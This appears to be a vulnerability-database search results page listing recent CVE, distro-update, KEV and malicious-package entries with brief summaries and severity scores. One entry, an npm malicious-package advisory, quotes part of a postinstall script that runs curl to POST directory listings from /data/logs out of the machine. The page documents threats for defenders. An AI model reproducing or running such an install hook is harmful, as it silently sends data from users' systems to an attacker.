Lucene search
K

6876 matches found

Nuclei
Nuclei
added yesterday74 views

Cisco Unified Communications Manager 7/8/9 - Directory Traversal

A directory traversal vulnerability in the Tomcat administrative web interface in Cisco Unified Communications Manager allows remote authenticated users to read arbitrary files via directory traversal sequences in an unspecified input string, aka Bug ID CSCui78815 id: CVE-2013-5528 info: name:...

8.1CVSS7.1AI score0.88559EPSS
Exploits22References4
Fedora
Fedora
added 5 days ago8 views

[SECURITY] Fedora 44 Update: openssh-10.2p1-12.fc44

SSH Secure SHell is a program for logging into and executing commands on a remote machine. SSH is intended to replace rlogin and rsh, and to provide secure encrypted communications between two untrusted hosts over an insecure network. X11 connections and arbitrary TCP/IP ports can also be forward...

6.5CVSS6AI score0.00367EPSS
Exploits2
EUVD
EUVD
added 5 days ago9 views

EUVD-2026-42450

Use after free in WebRTC in Google Chrome prior to 150.0.7871.115 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. Chromium security severity: High...

6.3AI score0.00306EPSS
Exploits0References3
Debian CVE
Debian CVE
added 6 days ago5 views

CVE-2026-15121

Use after free in WebRTC in Google Chrome prior to 150.0.7871.115 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. Chromium security severity: High...

8.8CVSS6.3AI score0.00306EPSS
Exploits0
OSV
OSV
added 2026/06/30 11:17 p.m.4 views

DEBIAN-CVE-2026-14078

Insufficient validation of untrusted input in WebRTC in Google Chrome prior to 150.0.7871.47 allowed a remote attacker to perform privilege escalation via a crafted HTML page. Chromium security severity: Low...

8.8CVSS5.8AI score0.00253EPSS
Exploits0References1
OSV
OSV
added 2026/06/30 11:17 p.m.6 views

DEBIAN-CVE-2026-14015

Race in WebRTC in Google Chrome on Windows prior to 150.0.7871.47 allowed a remote attacker to leak cross-origin data via a crafted HTML page. Chromium security severity: Medium...

6.5CVSS5.8AI score0.00197EPSS
Exploits0References1
ATTACKERKB
ATTACKERKB
added 2026/06/29 9:39 p.m.7 views

CVE-2026-10647

The USB CDC-NCM device class subsys/usb/devicenext/class/usbdcdcncm.c ignores the return value of usbdepenqueue in its ethernet transmit callback cdcncmsend. When the enqueue fails, the function still calls ksemtake&data-syncsem, KFOREVER, blocking on a completion semaphore that is only ever...

5.3CVSS6AI score0.00134EPSS
Exploits1References3Affected Software1
RedhatCVE
RedhatCVE
added 2026/06/25 11:42 p.m.7 views

CVE-2026-53256

A flaw was found in the Linux kernel's Bluetooth RFCOMM Radio Frequency Communication subsystem. A race condition in the rfcommconnectind function, specifically during the handling of listener sockets, can lead to a use-after-free vulnerability. A local attacker could exploit this to cause a deni...

8CVSS6AI score0.00266EPSS
Exploits0References4
CVE
CVE
added 2026/06/25 11:13 p.m.17 views

CVE-2026-9220

The CVE-2026-9220 entry describes a vulnerability in Setracker2 Android Companion App (package com.tgelec.setracker) affecting versions 3.1.5 and earlier. The underlying issue is that requests between the wearable and backend are encrypted with static, hardcoded AES keys and initialization vector...

8.7CVSS5.9AI score0.00232EPSS
Exploits0References1
OSV
OSV
added 2026/06/25 10:11 a.m.7 views

MAL-2026-6461 Malicious code in easy-string-kit232 (npm)

--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 9c3f74b6873c47dc8f3a6d6922e9d66d17cafe47b7a80447f45bfe0d1535a6b5 package.json declares a postinstall lifecycle script that auto-executes on npm install and runs curl -X POST -d "$ls -la /data/logs/"...

6AI score
Exploits0References1
Debian CVE
Debian CVE
added 2026/06/25 8:39 a.m.6 views

CVE-2026-53256

In the Linux kernel, the following vulnerability has been resolved: Bluetooth: RFCOMM: hold listener socket in rfcommconnectind rfcommgetsockbychannel scans rfcommsklist under the list lock, but returns the selected listener after dropping that lock without taking a reference. rfcommconnectind th...

8CVSS5.6AI score0.00266EPSS
Exploits0
CISA KEV Catalog
CISA KEV Catalog
added 2026/06/25 12:0 a.m.11 views

Cisco Unified Communications Manager Server-Side Request Forgery (SSRF) Vulnerability

Cisco Unified Communications Manager Unified CM and Cisco Unified Communications Manager Session Management Edition Unified CM SME contain a server-side request forgery SSRF Vulnerability that could allow an unauthenticated, remote attacker to write files to the underlying operating system that...

8.6CVSS5.9AI score0.41694EPSS
In wildExploits3
NVD
NVD
added 2026/06/24 9:16 p.m.10 views

CVE-2026-1840

The Aclara Metrum Cellular Web Interface is vulnerable to unauthorized access due to the absence of authentication controls on critical system functions. This weakness exposes essential configuration settings, allowing attackers to alter operational parameters and trigger system restarts without...

8.7CVSS0.00726EPSS
Exploits0References3
EUVD
EUVD
added 2026/06/24 7:47 p.m.6 views

EUVD-2026-39058

The Aclara Metrum Cellular Web Interface is vulnerable to unauthorized access due to the absence of authentication controls on critical system functions. This weakness exposes essential configuration settings, allowing attackers to alter operational parameters and trigger system restarts without...

8.7CVSS5.9AI score0.00726EPSS
Exploits0References3
ATTACKERKB
ATTACKERKB
added 2026/06/24 7:47 p.m.6 views

CVE-2026-1840

The Aclara Metrum Cellular Web Interface is vulnerable to unauthorized access due to the absence of authentication controls on critical system functions. This weakness exposes essential configuration settings, allowing attackers to alter operational parameters and trigger system restarts without...

8.7CVSS5.9AI score0.00726EPSS
Exploits0References4
Cvelist
Cvelist
added 2026/06/24 7:47 p.m.24 views

CVE-2026-1840 Missing authentication for critical function in Hubbell Aclara Metrum Cellular Web Interface

The Aclara Metrum Cellular Web Interface is vulnerable to unauthorized access due to the absence of authentication controls on critical system functions. This weakness exposes essential configuration settings, allowing attackers to alter operational parameters and trigger system restarts without...

8.7CVSS0.00726EPSS
Exploits0References3
EUVD
EUVD
added 2026/06/24 7:14 a.m.13 views

EUVD-2026-38711

In the Linux kernel, the following vulnerability has been resolved: net/smc: avoid NULL deref of conn-lnk in smcmsgevent tracepoint The smcmsgevent tracepoint class, shared by smctxsendmsg and smcrxrecvmsg, unconditionally dereferences smc-conn.lnk: stringname, smc-conn.lnk-ibname conn-lnk is onl...

5.8AI score0.00116EPSS
Exploits0References6
ICS
ICS
added 2026/06/23 6:0 a.m.17 views

Hubbell Aclara Metrum Cellular Web Interface

ADVISORY SUMMARY Successful exploitation of this vulnerability could allow attackers to manipulate critical device settings and repeatedly disrupt operations, potentially causing a loss of communications to the device. 2. RECOMMENDED PRACTICES CISA recommends users take defensive measures to...

8.7CVSS5.9AI score0.00726EPSS
Exploits0References11
VulnCheck KEV
VulnCheck KEV
added 2026/06/22 12:0 a.m.15 views

VulnCheck KEV: CVE-2026-20230

A vulnerability in Cisco Unified Communications Manager Unified CM and Cisco Unified Communications Manager Session Management Edition Unified CM SME could allow an unauthenticated, remote attacker to conduct server-side request forgery SSRF attacks through an affected device. This vulnerability ...

8.6CVSS7.6AI score0.41694EPSS
In wildExploits3References5
Fedora
Fedora
added 2026/06/21 1:10 a.m.7 views

[SECURITY] Fedora 43 Update: openssl-3.5.7-1.fc43

The OpenSSL toolkit provides support for secure communications between machines. OpenSSL includes a certificate management tool and shared libraries which provide various cryptographic algorithms and protocols...

9.1CVSS7.1AI score0.02719EPSS
Exploits0
Rows per page
Query Builder